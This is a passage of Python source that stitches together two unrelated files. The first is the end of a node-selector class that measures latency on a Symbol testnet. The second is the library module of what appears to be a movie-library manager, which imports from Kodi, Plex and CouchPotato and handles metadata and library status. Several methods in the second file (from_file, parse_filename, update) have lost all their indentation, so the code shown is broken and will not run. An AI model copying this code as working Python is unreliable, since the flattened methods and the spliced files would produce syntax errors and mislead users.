        """
        Returns the last block known to the node
        Parameters
        ----------
        url
            URL node in the form of http://ngl-dual-001.testnet.symboldev.network:3000
        Returns
        -------
        int
            Chain height; an unreachable node counts as height 0.
        """
        try:
            answer = requests.get(f'{url}/chain/info', timeout=1)
        except Exception:
            return 0
        node_info = answer.json()
        height = node_info['height']
        return int(height)

    @staticmethod
    def ping(url) -> Optional[float]:
        """Calculate and return a latency point using sockets"""
        if multiprocessing.current_process().daemon:
            # Daemon processes may not have a usable event loop; create one.
            asyncio.set_event_loop(asyncio.new_event_loop())
        parse_result = urlparse(url)
        loop = asyncio.get_event_loop()
        latency = loop.run_until_complete(NodeSelector.measure_latency(host=parse_result.hostname, port=parse_result.port, runs=3))
        if (result := len(list(filter(None, latency)))) == 0:
            return None
        # Average over the successful probes only (failed probes are None).
        average = sum(filter(None, latency)) / result
        return average

    @staticmethod
    async def measure_latency(
            host: str,
            port: int = 443,
            timeout: float = 5,
            runs: int = 1,
            wait: float = 0,
    ) -> list:
        """
        Builds a list composed of latency_points
        Parameters
        ----------
        host
            Host name
        port
            Port
        timeout
            Server response timeout
        runs
            Number of attempts
        wait
            Delay before request
        Returns
        -------
        list
            list of latency for all runs
        """
        tasks = []
        latency_points = []
        for i in range(runs):
            await asyncio.sleep(wait)
            # Probes run concurrently; results are collected in order below.
            tasks.append(asyncio.create_task(NodeSelector.latency_point(host=host, port=port, timeout=timeout)))
            # last_latency_point = await latency_point(host=host, port=port, timeout=timeout)
        for i in range(runs):
            latency_points.append(await tasks[i])
        return latency_points

    @staticmethod
    async def latency_point(host: str, port: int = 443, timeout: float = 5) -> Optional[float]:
        """
        Calculate a latency point using sockets. If something bad happens the point returned is None
        Parameters
        ----------
        host
            Host name
        port
            Port
        timeout
            Server response timeout
        Returns
        -------
        Optional[float]
            Returns float if possible
        """
        # New Socket and Time out
        # Start a timer
        s_start = time.time()
        # Try to Connect
        uri = f"ws://{host}:{port}"
        try:
            async with websockets.connect(uri, close_timeout=timeout):
                pass
        except exceptions.InvalidMessage:
            # Handshake oddities still prove the host answered; keep the timing.
            pass
        except exceptions.InvalidStatusCode:
            pass
        except Exception as e:
            logger.debug(str(e))
            return None
        # Stop Timer
        s_runtime = (time.time() - s_start) * 1000
        return float(s_runtime)
# Module-level singleton that keeps the best node selected in the background.
# Starts on the test-net list; switch networks via `node_selector.network_type`.
node_selector = NodeSelector(config.TEST_NODE_URLs)
|
library.py | import os
import re
import json
import datetime
import logging
import csv
import threading
from core import searchresults, plugins
import core
from core.movieinfo import TheMovieDatabase, Poster
from core.helpers import Url
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
import PTN
from gettext import gettext as _
logging = logging.getLogger(__name__)
class ImportDirectory(object):

    @staticmethod
    def scan_dir(directory, minsize=500, recursive=True):
        ''' Scans directory for movie files
        directory (str): absolute path to base directory of movie library
        minsize (int): minimum filesize in MB <optional - default 500>
        recursive (bool): scan recursively or just root directory <optional - default True>

        Collects candidate files, then filters out anything smaller than
        minsize.  (Mimetype checking is left to the caller.)

        Returns dict ajax-style response: {'files': [paths]} or {'error': msg}
        '''
        logging.info('Scanning {} for movies.'.format(directory))
        try:
            if recursive:
                files = ImportDirectory._walk(directory)
            else:
                files = [os.path.join(directory, i) for i in os.listdir(directory) if os.path.isfile(os.path.join(directory, i))]
        except Exception as e:
            logging.debug('scan_dir() ImportDirectory._walk exception {}'.format(str(e)))
            return {'error': str(e)}

        ms = minsize * 1024**2
        logging.debug('Specified minimum file size: {} Bytes.'.format(ms))
        f = []
        for i in files:
            # Ignore file not found errors (eg file was deleted between directory walk and size check)
            try:
                s = os.path.getsize(i)
                if s < ms:  # clearer than the previous `not s >= (ms)`
                    logging.debug('{} size is {} skipping.'.format(i, s))
                    continue
                f.append(i)
            except Exception as e:
                logging.debug('scan_dir() os.path.getsize exception {}'.format(str(e)))
                continue
        return {'files': f}

    @staticmethod
    def _walk(directory):
        ''' Recursively gets all files in dir
        directory: directory to scan for files

        Uses os.walk instead of hand-rolled recursion.  `onerror` re-raises
        so an unreadable/missing directory still surfaces as an error to
        scan_dir (os.walk swallows errors by default).

        Returns list of absolute file paths
        '''
        def _raise(err):
            raise err

        files = []
        for root, _dirs, filenames in os.walk(directory, onerror=_raise):
            for name in filenames:
                full_path = os.path.join(root, name)
                logging.debug('Found file {}'.format(full_path))
                files.append(full_path)
        return files
class ImportKodiLibrary(object):

    @staticmethod
    def get_movies(url):
        ''' Gets list of movies from kodi server
        url (str): url of kodi server

        url should include auth info if required.

        Gets movies from kodi, reformats list, and adds resolution/source info.
        Since Kodi doesn't care about souce we default to BluRay-<resolution>

        Returns dict ajax-style response
        '''
        # JSON-RPC request: all movies with the fields we need; limits end=0
        # means "no limit" in Kodi's API — TODO confirm against the Kodi docs.
        krequest = {'jsonrpc': '2.0',
                    'method': 'VideoLibrary.GetMovies',
                    'params': {
                        'limits': {
                            'start': 0,
                            'end': 0
                        },
                        'properties': [
                            'title',
                            'year',
                            'imdbnumber',
                            'file',
                            'streamdetails'
                        ],
                        'sort': {
                            'order': 'ascending',
                            'method': 'label',
                            'ignorearticle': True
                        }
                    },
                    'id': 'libMovies'
                    }
        logging.info('Retreiving movies from Kodi.')
        # The whole JSON-RPC request is serialized into the query string.
        url = '{}/jsonrpc?request={}'.format(url, json.dumps(krequest))
        try:
            response = Url.open(url)
        except Exception as e:
            logging.error('Unable to reach Kodi server.', exc_info=True)
            return {'response': False, 'error': str(e.args[0].reason).split(']')[-1]}
        if response.status_code != 200:
            return {'response': False, 'error': '{} {}'.format(response.status_code, response.reason.title())}
        # Skip anything already present in the local library (matched by imdbid).
        library = [i['imdbid'] for i in core.sql.get_user_movies()]
        movies = []
        today = str(datetime.date.today())
        for i in json.loads(response.text)['result']['movies']:
            if i['imdbnumber'] in library:
                logging.info('{} in library, skipping.'.format(i['imdbnumber']))
                continue
            logging.info('Found Kodi movie {}.'.format(i['title']))
            movie = {}
            movie['title'] = i['title']
            movie['year'] = i['year']
            movie['imdbid'] = i['imdbnumber']
            movie['file'] = i['file']
            movie['added_date'] = movie['finished_date'] = today
            movie['audiocodec'] = i['streamdetails']['audio'][0].get('codec') if i['streamdetails']['audio'] else ''
            # Kodi reports DTS variants as 'dca'/'dts*'; normalize to 'DTS'.
            if movie['audiocodec'] == 'dca' or movie['audiocodec'].startswith('dts'):
                movie['audiocodec'] = 'DTS'
            movie['resolution'] = 'Unknown'
            if i['streamdetails']['video']:
                movie['videocodec'] = i['streamdetails']['video'][0].get('codec')
                # Derive resolution from the video width; source defaults to BluRay.
                width = i['streamdetails']['video'][0]['width']
                if width > 1920:
                    movie['resolution'] = 'BluRay-4K'
                elif 1920 >= width > 1440:
                    movie['resolution'] = 'BluRay-1080P'
                elif 1440 >= width > 720:
                    movie['resolution'] = 'BluRay-720P'
                else:
                    movie['resolution'] = 'DVD-SD'
            else:
                movie['videocodec'] = ''
            movies.append(movie)
        return {'response': True, 'movies': movies}
class ImportPlexLibrary(object):
    ''' Several of these methods are not currently used due to Plex's
    api being less than ideal.
    '''

    @staticmethod
    def _leading_int(text, default=None):
        ''' Parses the leading run of digits of text into an int.
        text (str): string that may start with digits
        default: value to return when text has no leading digits

        Extracted helper for the previously duplicated while-loop digit
        scanners (width and size columns).

        Returns int or default
        '''
        digits = ''
        for ch in text:
            if not ch.isdigit():
                break
            digits += ch
        return int(digits) if digits else default

    @staticmethod
    def read_csv(csv_text):
        ''' Parse plex csv
        csv_text (str): text from csv file

        Returns dict ajax-style response with 'complete' and 'incomplete'
        movie lists; movies already in the library are skipped.
        '''
        logging.info('Parsing Plex library CSV.')
        library = [i['imdbid'] for i in core.sql.get_user_movies()]
        library_tmdb = [i['tmdbid'] for i in core.sql.get_user_movies()]

        # Guess the delimiter from the character after the first quoted field.
        delim = csv_text.split('"')[2]
        if delim not in (',', ';', '|', ':', '\t'):
            delim = ','

        try:
            movies = []
            reader = csv.DictReader(csv_text.splitlines(), delimiter=delim)
            for row in reader:
                movies.append(dict(row))
        except Exception as e:
            return {'response': False, 'error': str(e)}

        parsed_movies = []
        incomplete = []
        today = str(datetime.date.today())
        for movie in movies:
            parsed = {}
            try:
                logging.info('Parsing Plex movie {}'.format(movie['Title']))
                complete = True
                # The MetaDB link's last path segment is either an imdb ('tt...')
                # or a tmdb (all digits) identifier.
                db_id = movie['MetaDB Link'].split('/')[-1]
                if db_id.startswith('tt'):
                    if db_id in library:
                        continue
                    else:
                        parsed['imdbid'] = db_id
                elif db_id.isdigit():
                    if db_id in library_tmdb:
                        continue
                    else:
                        parsed['tmdbid'] = db_id
                else:
                    parsed['imdbid'] = ''
                    complete = False

                parsed['title'] = movie['Title']
                parsed['year'] = movie['Year']
                parsed['added_date'] = parsed['finished_date'] = today

                parsed['audiocodec'] = movie['Audio Codec']
                if parsed['audiocodec'] == 'dca' or parsed['audiocodec'].startswith('dts'):
                    parsed['audiocodec'] = 'DTS'

                width = ImportPlexLibrary._leading_int(movie['Width'])
                if width is None:
                    width = 0
                    complete = False
                if width > 1920:
                    parsed['resolution'] = 'BluRay-4K'
                elif 1920 >= width > 1440:
                    parsed['resolution'] = 'BluRay-1080P'
                elif 1440 >= width > 720:
                    parsed['resolution'] = 'BluRay-720P'
                else:
                    parsed['resolution'] = 'DVD-SD'

                parsed['size'] = ImportPlexLibrary._leading_int(movie['Part Size as Bytes'], 0)
                parsed['file'] = movie['Part File']

                if complete:
                    parsed_movies.append(parsed)
                else:
                    incomplete.append(parsed)
            except Exception:
                logging.error('Error parsing Plex CSV.', exc_info=True)
                incomplete.append(parsed)

        return {'response': True, 'complete': parsed_movies, 'incomplete': incomplete}
class ImportCPLibrary(object):

    @staticmethod
    def get_movies(url):
        ''' Gets list of movies from CP
        url (str): full url of cp movies.list api call

        Skips movies already in the local library; for finished CP movies the
        best release is parsed for codec/resolution/size information.

        Returns dict ajax-style response
        '''
        logging.info('Reading CouchPotato library.')
        try:
            r = Url.open(url)
        except Exception as e:
            return {'response': False, 'error': str(e)}

        if r.status_code != 200:
            return {'response': False, 'error': '{} {}'.format(r.status_code, r.reason.title())}

        try:
            cp = json.loads(r.text)
        except Exception as e:
            return {'response': False, 'error': _('Malformed json response from CouchPotato')}

        # NOTE(review): empty library returns a list [''] instead of the usual
        # response dict — callers apparently rely on this; confirm before changing.
        if cp['total'] == 0:
            return ['']

        library = [i['imdbid'] for i in core.sql.get_user_movies()]
        movies = []
        for m in cp['movies']:
            if m['info']['imdb'] in library:
                logging.debug('{} in library, skipping.'.format(m['info']['original_title']))
                continue
            logging.debug('Parsing CouchPotato movie {}'.format(m['info']['original_title']))
            movie = {}
            if m['status'] == 'done':
                movie['status'] = 'Disabled'
                # Find the first finished release and derive quality data from it.
                for i in m['releases']:
                    if i['status'] == 'done':
                        if i.get('info'):
                            # handle missing keys - not all CP entries have all fields populated
                            try:
                                name = i['info']['name']
                            except Exception as e:
                                name = m['info']['original_title']
                        elif i.get('identifier'):
                            name = i['identifier'].lower()
                        else:
                            continue
                        title_data = PTN.parse(name)
                        movie['audiocodec'] = title_data.get('audio')
                        movie['videocodec'] = title_data.get('codec')
                        # First file that maps to a configured category wins.
                        for filepath in i.get('files', {}).get('movie', []):
                            movie['category'] = Metadata.get_category_from_path(filepath)
                            if movie['category']:
                                movie['finished_file'] = filepath
                                break
                        try:
                            # CP stores size in MB; convert to bytes.
                            movie['size'] = i.get('info', {}).get('size', 0) * 1024 * 1024
                        except Exception as e:
                            movie['size'] = 0
                        # Guess resolution from tokens in the release name.
                        if any(i in name for i in ['4K', 'UHD', '2160P']):
                            movie['resolution'] = 'BluRay-4K'
                        elif any(i in name for i in ['1080', 'brrip', 'bdrip', 'bluray']):
                            movie['resolution'] = 'BluRay-1080P'
                        elif '720' in name:
                            movie['resolution'] = 'BluRay-720P'
                        else:
                            movie['resolution'] = 'DVD-SD'
                        break
                movie.setdefault('size', 0)
                movie['quality'] = 'Default'
            else:
                movie['status'] = 'Waiting'
            movie.setdefault('resolution', 'BluRay-1080P')

            # Map CP's info dict onto the TMDB-style fields used locally.
            cpm = m['info']
            movie['title'] = cpm.get('original_title') or ''
            movie['year'] = cpm.get('year') or 'N/A'
            movie['overview'] = cpm.get('plot') or ''
            p = (cpm.get('images', {}).get('poster_original') or [''])[0].split('/')[-1]
            if p:
                movie['poster_path'] = p
            else:
                movie['poster_path'] = None
            movie['url'] = 'https://www.themoviedb.org/movie/{}'.format(cpm.get('tmdb_id', ''))
            movie['vote_average'] = cpm.get('rating', {}).get('imdb', [0])[0]
            movie['imdbid'] = cpm.get('imdb')
            movie['id'] = cpm.get('tmdb_id')
            ts = cpm.get('release_date', {}).get('theater')
            movie['release_date'] = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') if ts else None
            movie['alternative_titles'] = {'titles': [{'iso_3166_1': 'US',
                                                       'title': ','.join(cpm.get('titles', []))
                                                       }]
                                           }
            movie['release_dates'] = {'results': []}
            movies.append(movie)
        return {'response': True, 'movies': movies}
class Metadata(object):
''' Methods for gathering/preparing metadata for movies
'''
@staticmethod
def from_file(filepath, imdbid=None):
''' Gets video metadata using hachoir.parser
filepath (str): absolute path to movie file
imdbid (str): imdb id # <optional - Default None>
On failure can return empty dict
Returns dict
'''
logging.info('Gathering metadata for {}.'.format(filepath))
data = {
'title': None,
'year': None,
'resolution': None,
'rated': None,
'imdbid': imdbid,
'videocodec': None,
'audiocodec': None,
'releasegroup': None,
'source': None,
'quality': None,
'category': None,
'path': filepath,
'edition': []
}
titledata = Metadata.parse_filename(filepath)
data.update(titledata)
filedata = Metadata.parse_media(filepath)
data.update(filedata)
if data.get('resolution'):
if data['resolution'].upper() in ('4K', '1080P', '720P'):
data['resolution'] = '{}-{}'.format(data['source'] or 'BluRay', data['resolution'].upper())
else:
data['resolution'] = 'DVD-SD'
if data.get('title') and not data.get('imdbid'):
title_date = '{} {}'.format(data['title'], data['year']) if data.get('year') else data['title']
tmdbdata = TheMovieDatabase.search(title_date, single=True)
if not tmdbdata:
logging.warning('Unable to get data from TheMovieDB for {}'.format(data['title']))
return data
tmdbdata = tmdbdata[0]
tmdbid = tmdbdata.get('id')
if not tmdbid:
logging.warning('Unable to get data from TheMovieDB for {}'.format(data['imdbid']))
return data
tmdbdata = tmdbdata = TheMovieDatabase._search_tmdbid(tmdbid)
if tmdbdata:
tmdbdata = tmdbdata[0]
else:
logging.warning('Unable to get data from TMDB for {}'.format(data['imdbid']))
return data
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
if data.get('3d'):
data['edition'].append('3D')
data['edition'] = ' '.join(sorted(data['edition']))
return data
    @staticmethod
    def parse_media(filepath):
        ''' Uses Hachoir-metadata to parse the file header to metadata
        filepath (str): absolute path to file

        Attempts to get resolution from media width

        Returns dict of metadata
        '''
        logging.info('Parsing codec data from file {}.'.format(filepath))
        metadata = {}
        try:
            with createParser(filepath) as parser:
                extractor = extractMetadata(parser)
                filedata = extractor.exportDictionary(human=False)
                # Reaches into hachoir internals to release the underlying file
                # handle — presumably the context manager alone does not close
                # it; verify against the hachoir version in use.
                parser.stream._input.close()
        except Exception as e:
            logging.error('Unable to parse metadata from file header.', exc_info=True)
            return metadata

        if filedata:
            # For mp4, mvk, avi in order
            video = filedata.get('Metadata') or \
                filedata.get('video[1]') or \
                filedata.get('video') or \
                {}
            # mp4 doesn't have audio data so this is just for mkv and avi
            audio = filedata.get('audio[1]') or {}

            # Map pixel width onto the resolution buckets used elsewhere.
            if video.get('width'):
                width = int(video.get('width'))
                if width > 1920:
                    metadata['resolution'] = '4K'
                elif 1920 >= width > 1440:
                    metadata['resolution'] = '1080P'
                elif 1440 >= width > 720:
                    metadata['resolution'] = '720P'
                else:
                    metadata['resolution'] = 'SD'
            else:
                metadata['resolution'] = 'SD'

            if audio.get('compression'):
                # Strip matroska's 'A_' codec prefix.
                metadata['audiocodec'] = audio['compression'].replace('A_', '')
            if video.get('compression'):
                # Strip matroska's 'V_' prefix and any '(...)' / '/...' suffix.
                metadata['videocodec'] = video['compression'].split('/')[0].split('(')[0].replace('V_', '')

        return metadata
@staticmethod
def parse_filename(filepath):
''' Uses PTN to get as much info as possible from path
filepath (str): absolute path to movie file
Parses parent directory name first, then file name if folder name seems incomplete.
Returns dict of metadata
'''
dirname = os.path.split(filepath)[0].split(os.sep)[-1]
logging.info('Parsing directory name for movie information: {}.'.format(dirname))
meta_data = PTN.parse(dirname)
for i in ('excess', 'episode', 'episodeName', 'season', 'garbage', 'website'):
meta_data.pop(i, None)
if len(meta_data) > 3:
meta_data['release_name'] = dirname
logging.info('Found {} in filename.'.format(meta_data))
else:
logging.debug('Parsing directory name does not look accurate. Parsing file name.')
filename = os.path.basename(filepath)
meta_data = PTN.parse(filename)
logging.info('Found {} in file name.'.format(meta_data))
if len(meta_data) < 2:
logging.warning('Little information found in file name. Movie may be incomplete.')
meta_data['release_title'] = filename
title = meta_data.get('title')
if title and title[-1] == '.':
meta_data['title'] = title[:-1]
# Make sure this matches our key names
if 'year' in meta_data:
meta_data['year'] = str(meta_data['year'])
meta_data['videocodec'] = meta_data.pop('codec', None)
meta_data['audiocodec'] = meta_data.pop('audio', None)
meta_data['category'] = Metadata.get_category_from_path(filepath)
qual = meta_data.pop('quality', '')
for source, aliases in core.CONFIG['Quality']['Aliases'].items():
if any(a.lower() == qual.lower() for a in aliases):
meta_data['source'] = source
break
meta_data.setdefault('source', None)
meta_data['releasegroup'] = meta_data.pop('group', None)
return meta_data
@staticmethod
def get_category_from_path(filepath):
moverpath = core.CONFIG['Postprocessing']['moverpath']
if moverpath and filepath.startswith(Metadata.root_mover_path(moverpath)):
return 'Default'
for category, category_config in core.CONFIG['Categories'].items():
moverpath = category_config['moverpath']
if moverpath and filepath.startswith(Metadata.root_mover_path(moverpath)):
return category
return None
@staticmethod
def root_mover_path(path):
path = os.path.join(path, '') # ensure path ends with /
return os.path.join(os.path.split(re.sub("{.+}.*$", '', path))[0], '')
    @staticmethod
    def convert_to_db(movie):
        ''' Takes movie data and converts to a database-writable dict
        movie (dict): of movie information

        Used to prepare TMDB's movie response for write into MOVIES
        Must include Watcher-specific keys ie resolution
        Makes sure all keys match and are present
        Sorts out alternative titles and digital release dates

        Returns dict ready to sql.write into MOVIES
        '''
        logging.info('Converting movie metadata to database structure for {}.'.format(movie['title']))
        # Fill required identity fields with placeholders when absent.
        if not movie.get('imdbid'):
            movie['imdbid'] = 'N/A'
        if not movie.get('year') and movie.get('release_date'):
            # Derive year from the ISO release date (YYYY-MM-DD).
            movie['year'] = movie['release_date'][:4]
        elif not movie.get('year'):
            movie['year'] = 'N/A'
        movie.setdefault('added_date', str(datetime.date.today()))
        # Local poster files are named by imdbid.
        if movie.get('poster_path'):
            movie['poster'] = '{}.jpg'.format(movie['imdbid'])
        else:
            movie['poster'] = None
        # TMDB calls the plot 'overview'; keep an existing 'plot' if set.
        movie['plot'] = movie.get('overview') if not movie.get('plot') else movie.get('plot')
        movie['url'] = 'https://www.themoviedb.org/movie/{}'.format(movie.get('id', movie.get('tmdbid')))
        movie['score'] = movie.get('score') or movie.get('vote_average') or 0
        if not movie.get('status'):
            movie['status'] = 'Waiting'
            movie['backlog'] = 0
        if not movie.get('tmdbid'):
            movie['tmdbid'] = movie.get('id')
        # Flatten TMDB's alternative_titles structure into a comma-joined
        # string of US titles (skip if already flattened to a str).
        if movie.get('alternative_titles') and not isinstance(movie.get('alternative_titles'), str):
            a_t = []
            for i in movie.get('alternative_titles', {}).get('titles', []):
                if i['iso_3166_1'] == 'US':
                    a_t.append(i['title'])
            movie['alternative_titles'] = ','.join(a_t)
        # Earliest digital/physical release (TMDB type >= 4) becomes the
        # home media release date.
        dates = []
        for i in movie.get('release_dates', {}).get('results', []):
            for d in i['release_dates']:
                if d['type'] >= 4:
                    dates.append(d['release_date'])
        if dates:
            movie['media_release_date'] = min(dates)[:10]
        if not movie.get('quality'):
            movie['quality'] = 'Default'
        if not movie.get('category'):
            movie['category'] = 'Default'
        movie['finished_file'] = movie.get('finished_file')
        # Build sort_title by moving a leading article to the end.
        if movie['title'].startswith('The '):
            movie['sort_title'] = movie['title'][4:] + ', The'
        elif movie['title'].startswith('A '):
            movie['sort_title'] = movie['title'][2:] + ', A'
        elif movie['title'].startswith('An '):
            movie['sort_title'] = movie['title'][3:] + ', An'
        else:
            movie['sort_title'] = movie['title']
        if not movie.get('filters'):
            movie['filters'] = '{"preferredwords": "", "requiredwords": "", "ignoredwords": ""}'
        for k, v in movie.items():
            if isinstance(v, str):
                movie[k] = v.strip()
        # Keep only keys that are actual MOVIES table columns.
        movie = {k: v for k, v in movie.items() if k in [i.name for i in core.sql.MOVIES.c]}
        return movie
@staticmethod
def update(imdbid, tmdbid=None, force_poster=True):
''' Updates metadata from TMDB
imdbid (str): imdb id #
tmdbid (str): or int tmdb id # <optional - default None>
force_poster (bool): whether or not to always redownload poster <optional - default True>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
If force_poster is True, the poster will be re-downloaded.
If force_poster is False, the poster will only be redownloaded if the local
database does not have a 'poster' filepath stored. In other words, this
will only grab missing posters.
Returns dict ajax-style response
'''
logging.info('Updating metadata for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if force_poster:
get_poster = True
elif not movie.get('poster'):
get_poster = True
elif not os.path.isfile(os.path.join(core.PROG_PATH, movie['poster'])):
get_poster = True
else:
logging.debug('Poster will not be redownloaded.')
get_poster = False
if tmdbid is None:
tmdbid = movie.get('tmdbid')
if not tmdbid:
logging.debug('TMDB id not found in local database, searching TMDB for {}'.format(imdbid))
tmdb_data = TheMovieDatabase._search_imdbid(imdbid)
tmdbid = tmdb_data[0].get('id') if tmdb_data else None
if not tmdbid:
logging.debug('Unable to find {} on TMDB.'.format(imdbid))
return {'response': False, 'error': 'Unable to find {} on TMDB.'.format(imdbid)}
new_data = TheMovieDatabase._search_tmdbid(tmdbid)
if not new_data:
logging.warning('Empty response from TMDB.')
return
else:
new_data = new_data[0]
new_data.pop('status')
target_poster = os.path.join(Poster.folder, '{}.jpg'.format(imdbid))
if new_data.get('poster_path'):
poster_path = 'http://image.tmdb.org/t/p/w300{}'.format(new_data['poster_path'])
movie['poster'] = '{}.jpg'.format(movie['imdbid'])
else:
poster_path = None
movie.update(new_data)
movie = Metadata.convert_to_db(movie)
core.sql.update_multiple_values('MOVIES', movie, 'imdbid', imdbid)
if poster_path and get_poster:
if os.path.isfile(target_poster):
try:
os.remove(target_poster)
except FileNotFoundError:
pass
except Exception as e:
logging.warning('Unable to remove existing poster.', exc_info=True)
return {'response': False, 'error': 'Unable to remove existing poster.'}
Poster.save(imdbid, poster_path)
return {'response': True, 'message': 'Metadata updated.'}
class Manage(object):
    ''' Methods to manipulate status of movies or search results in database
    '''

    @staticmethod
    def scanmissingfiles():
        ''' Scans library for finished movies whose file no longer exists

        Per config, either removes the movie from the library or reverts it
        to Wanted (clearing finished info and marked/search results).

        Does not return
        '''
        movies = core.sql.execute(['SELECT * FROM MOVIES WHERE finished_file is not null'])
        if movies is None:
            logging.warning('Unable to read database.')
            return
        movies = core.sqldb.proxy_to_dict(movies)
        action = core.CONFIG['System']['FileManagement']['missingfileaction']
        db_update_values = []
        for i in movies:
            if not os.path.exists(i['finished_file']):
                logging.info('File {} is missing for movie {}'.format(i['finished_file'], i['title']))
                if action == 'remove':
                    if Manage.remove_movie(i['imdbid'])['response'] is False:
                        logging.error('Unable to remove {} from library'.format(i['title']))
                elif action == 'revert':
                    db_update_values.append({'imdbid': i['imdbid'],
                                             'finished_file': None,
                                             'finished_date': None,
                                             'status': 'Wanted',
                                             'backlog': 0})
                    # Clear old results so the status isn't re-derived from them.
                    if core.sql.delete('MARKEDRESULTS', 'imdbid', i['imdbid']) is None or \
                            core.sql.delete('SEARCHRESULTS', 'imdbid', i['imdbid']) is None:
                        logging.warning('Unable to remove marked releases. Status change may be incorrect.')
        if len(db_update_values) > 0:
            core.sql.update_multiple_rows('MOVIES', db_update_values, 'imdbid')
        return

    @staticmethod
    def verify(movie, today=None):
        ''' Checks for verfied releases based on config
        movie (dict): movie info
        today (obj): datetime.datetime.today() object <optional - default calls datetime.dateimte.today()>

        Checks (in order):
            If verify releases is enabled
            If movie has a theatrical release date
            If theatrical release date is older than skip weeks per user config
            If predb verification -- check predb
            If home media release verification - check if release is in the past
            If all enabled conditions fail, return False

        Returns Bool
        '''
        today = today or datetime.datetime.today()
        if core.CONFIG['Search']['verifyreleases'] == '':
            # Verification disabled entirely.
            verified = True
        elif not movie.get('release_date'):
            logging.info('{} does not have a theatrical release date, skipping verification check as Unverified.'.format(movie['title']))
            verified = False
        elif core.CONFIG['Search']['verifyreleasesskip'] and datetime.datetime.strptime(movie['release_date'], '%Y-%m-%d') + datetime.timedelta(days=7 * core.CONFIG['Search']['verifyreleasesskipweeks']) < today:
            logging.info('{} is older than {}, skipping verification check as Verified.'.format(movie['title'], core.CONFIG['Search']['verifyreleasesskipweeks']))
            verified = True
        elif core.CONFIG['Search']['verifyreleases'] == 'predb':
            if movie.get('predb') == 'found':
                verified = True
            else:
                verified = False
        elif core.CONFIG['Search']['verifyreleases'] == 'mediareleasedate':
            if not movie.get('predb') and movie.get('predb_backlog'):
                # Stale predb backlog flag for a movie predb never found.
                logging.debug('Resetting predb backlog status for unfound movie {} {}'.format(movie['title'], movie['year']))
                core.sql.update('MOVIES', 'predb_backlog', None, 'imdbid', movie['imdbid'])
            if not movie.get('media_release_date'):
                logging.info('{} does not yet have a home media release date.'.format(movie['title']))
                verified = False
            else:
                media_release = datetime.datetime.strptime(movie['media_release_date'], '%Y-%m-%d')
                if media_release < today:
                    verified = True
                else:
                    verified = False
        else:
            verified = False
        # Promote/demote the library status to match the verification result.
        if verified and movie['status'] == 'Waiting':
            logging.info('Verification criteria met for {} {}, setting status to Wanted'.format(movie['title'], movie['year']))
            core.sql.update('MOVIES', 'status', 'Wanted', 'imdbid', movie['imdbid'])
        elif not verified and movie['status'] not in ('Waiting', 'Disabled', 'Finished'):
            logging.info('Verified criteria not met for {} {}, resetting setting status to Waiting'.format(movie['title'], movie['year']))
            core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', movie['imdbid'])
        if verified:
            logging.info('{} passes verification checks, will include title in search.'.format(movie['title']))
        else:
            logging.info('{} does not pass verification checks, will ignore for now.'.format(movie['title']))
        return verified

    @staticmethod
    def add_movie(movie, full_metadata=False):
        ''' Adds movie to Wanted list.
        movie (dict): movie info to add to database.
        full_metadata (bool): if data is complete and ready for write

        movie MUST inlcude tmdb id as data['id']

        Writes data to MOVIES table.

        If full_metadata is False, searches tmdb for data['id'] and updates data
        full_metadata should only be True when passing movie as data pulled
        directly from a tmdbid search

        If Search on Add enabled,
            searches for movie immediately in separate thread.
            If Auto Grab enabled, will snatch movie if found.

        Returns dict ajax-style response
        '''
        logging.info('Adding {} to library.'.format(movie.get('title')))
        response = {}
        tmdbid = movie['id']
        if not full_metadata:
            logging.debug('More information needed, searching TheMovieDB for {}'.format(tmdbid))
            tmdb_data = TheMovieDatabase._search_tmdbid(tmdbid)
            if not tmdb_data:
                response['error'] = _('Unable to find {} on TMDB.').format(tmdbid)
                return response
            else:
                tmdb_data = tmdb_data[0]
            # Keep our library status, not TMDB's production status.
            tmdb_data.pop('status')
            movie.update(tmdb_data)
        if core.sql.row_exists('MOVIES', imdbid=movie['imdbid']):
            logging.info('{} already exists in library.'.format(movie['title']))
            response['response'] = False
            response['error'] = _('{} already exists in library.').format(movie['title'])
            return response
        if not movie.get('category', None) and movie.get('finished_file', None):
            movie['category'] = Metadata.get_category_from_path(movie['finished_file'])
        movie.setdefault('quality', 'Default')
        movie.setdefault('category', 'Default')
        movie.setdefault('status', 'Waiting')
        movie.setdefault('origin', 'Search')
        poster_path = movie.get('poster_path')
        movie = Metadata.convert_to_db(movie)
        if not core.sql.write('MOVIES', movie):
            response['response'] = False
            response['error'] = _('Could not write to database.')
        else:
            if poster_path:
                poster_url = 'http://image.tmdb.org/t/p/w300/{}'.format(poster_path)
                # Download the poster off the request thread.
                threading.Thread(target=Poster.save, args=(movie['imdbid'], poster_url)).start()
            response['response'] = True
            response['message'] = _('{} {} added to library.').format(movie['title'], movie['year'])
            plugins.added(movie['title'], movie['year'], movie['imdbid'], movie['quality'])
        return response

    @staticmethod
    def remove_movie(imdbid):
        ''' Remove movie from library
        imdbid (str): imdb id #

        Calls core.sql.remove_movie and removes poster (in separate thread)

        Returns dict ajax-style response
        '''
        logging.info('Removing {} for library.'.format(imdbid))
        m = core.sql.get_movie_details('imdbid', imdbid)
        removed = core.sql.remove_movie(imdbid)
        if removed is True:
            response = {'response': True, 'message': _('{} removed from library.').format(m.get('title'))}
            threading.Thread(target=Poster.remove, args=(imdbid,)).start()
        elif removed is False:
            response = {'response': False, 'error': _('Unable to remove {}.').format(m.get('title'))}
        elif removed is None:
            response = {'response': False, 'error': _('{} does not exist in library.').format(imdbid)}
        return response

    # @todo move to searchresults module?
    @staticmethod
    def searchresults(guid, status, movie_info=None):
        ''' Marks searchresults status
        guid (str): download link guid
        status (str): status to set
        movie_info (dict): of movie metadata <optional - default None>

        If guid is in SEARCHRESULTS table, marks it as status.

        If guid not in SEARCHRESULTS, uses movie_info to create a result.

        Returns bool
        '''
        TABLE = 'SEARCHRESULTS'
        logging.info('Marking guid {} as {}.'.format(guid.split('&')[0], status))
        if core.sql.row_exists(TABLE, guid=guid):
            # Mark bad in SEARCHRESULTS
            logging.info('Marking {} as {} in SEARCHRESULTS.'.format(guid.split('&')[0], status))
            if not core.sql.update(TABLE, 'status', status, 'guid', guid):
